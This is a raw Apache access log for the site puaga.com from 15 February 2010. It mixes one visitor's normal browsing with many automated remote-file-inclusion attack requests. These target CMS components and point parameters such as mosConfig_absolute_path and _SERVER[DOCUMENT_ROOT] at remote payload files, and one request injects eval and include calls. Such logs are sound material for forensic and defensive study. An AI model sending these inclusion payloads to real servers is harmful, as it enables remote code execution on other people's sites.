200.85.1.152 - - [15/Feb/2010:08:03:35 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:03:35 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:03:35 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:04:09 -0800] "GET /logs/access_100114.log%20%20//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:08:04:20 -0800] "GET /logs/access_100118.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:08:04:38 -0800] "GET /logs/access_100120.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:04:40 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:04:41 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:04:41 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:05:00 -0800] "GET /bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:05:00 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:05:00 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:05:03 -0800] "GET /logs/access_100114.log%20%20//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:08:05:06 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:08:05:06 -0800] "GET /logs/access_100129.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:08:05:07 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:08:05:07 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:05:07 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:05:07 -0800] "GET /logs/access_100130.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:05:07 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_Home.png HTTP/1.1" 200 5012 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/logo.png HTTP/1.1" 200 11323 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_Pixero_Hover.png HTTP/1.1" 200 4643 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:27 -0800] "GET /images/PageBackSwills.jpg HTTP/1.1" 200 41348 "http://www.puaga.com/style/5.style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:30 -0800] "GET /images/TL_Simple_Hover.png HTTP/1.1" 200 4805 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:36 -0800] "GET / HTTP/1.1" 200 3642 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:39 -0800] "GET /diger HTTP/1.1" 301 90 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:39 -0800] "GET /diger/ HTTP/1.1" 200 3545 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:42 -0800] "GET /diger/ HTTP/1.1" 200 3545 "http://www.puaga.com/diger/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:48 -0800] "GET / HTTP/1.1" 302 5 "http://www.puaga.com/diger/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "simple.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /simplepack/grader/index2.php HTTP/1.1" 200 8055 "http://www.puaga.com/diger/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /simplepack/grader/script.js HTTP/1.1" 200 478 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_Home_Hover.png HTTP/1.1" 200 5160 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_AkifBar.png HTTP/1.1" 200 4614 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_AkifBar_Hover.png HTTP/1.1" 200 4767 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_Diger.png HTTP/1.1" 200 4637 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/logo.png HTTP/1.1" 200 11323 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_Diger_Hover.png HTTP/1.1" 200 4675 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_Pixero_Hover.png HTTP/1.1" 200 4643 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /images/TL_Simple_Hover.png HTTP/1.0" 200 4805 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /favicon.ico HTTP/1.0" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /simplepack/grader/i/TopHeader2.gif HTTP/1.1" 200 6795 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /simplepack/grader/i2/Download2.png HTTP/1.0" 200 8618 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /simplepack/grader/i/Bottom2.gif HTTP/1.0" 200 368 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:49 -0800] "GET /simplepack/grader/i/Back.gif HTTP/1.1" 200 75 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:52 -0800] "GET /simplepack/grader/i2/Download.png HTTP/1.1" 200 8288 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:52 -0800] "GET /simplepack/grader/i/Reklam2.gif HTTP/1.1" 200 40755 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:54 -0800] "GET / HTTP/1.1" 302 5 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "simple.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:54 -0800] "GET /simplepack/grader/index2.php HTTP/1.1" 200 8055 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:56 -0800] "GET / HTTP/1.1" 302 2624 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "akifbar.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/maindp.php HTTP/1.1" 200 6147 "http://puaga.com/simplepack/grader/index2.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/iscript.js HTTP/1.1" 200 486 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Download.png HTTP/1.1" 200 8288 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Download2.png HTTP/1.1" 200 8618 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Header.gif HTTP/1.1" 200 2985 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Reklam1.gif HTTP/1.1" 200 10811 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/AkifBarTop.png HTTP/1.1" 200 9536 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Exc1.gif HTTP/1.1" 200 1633 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Exc2.gif HTTP/1.1" 200 1599 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Exc4.gif HTTP/1.1" 200 1636 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/Exc3.gif HTTP/1.1" 200 1728 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:57 -0800] "GET /akifbar/images/AkifBarBottom.png HTTP/1.1" 200 332 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:58 -0800] "GET / HTTP/1.1" 200 3642 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:58 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:58 -0800] "GET /images/PuagaSubLink_38472394873298.png HTTP/1.1" 200 8153 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:05:58 -0800] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:01 -0800] "GET / HTTP/1.1" 302 2624 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "akifbar.puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:01 -0800] "GET /akifbar/maindp.php HTTP/1.1" 200 6147 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:05 -0800] "GET /diger/ HTTP/1.1" 200 3545 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:08 -0800] "GET /cam/ HTTP/1.1" 200 749 "http://puaga.com/diger/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:08 -0800] "GET /cam/top2.gif HTTP/1.1" 200 5297 "http://puaga.com/cam/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:08 -0800] "GET /webcam.jpg HTTP/1.1" 200 28789 "http://puaga.com/cam/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:08 -0800] "GET /cam/shadowtext.gif HTTP/1.1" 200 3211 "http://puaga.com/cam/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
76.66.18.250 - - [15/Feb/2010:08:06:08 -0800] "GET /cam/bottom.gif HTTP/1.1" 200 2245 "http://puaga.com/cam/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
208.70.79.113 - - [15/Feb/2010:08:06:15 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:06:15 -0800] "GET /logs/access_100129.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:06:15 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:06:15 -0800] "GET /logs/access.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:08:06:19 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:08:06:28 -0800] "GET /logs///////components/com_simpleboard/image_upload.php?sbp=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:08:06:28 -0800] "GET /logs/access_100104.log%20%20///////components/com_simpleboard/image_upload.php?sbp=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:08:06:28 -0800] "GET //////components/com_simpleboard/image_upload.php?sbp=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:08:06:54 -0800] "GET //////components/com_simpleboard/image_upload.php?sbp=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
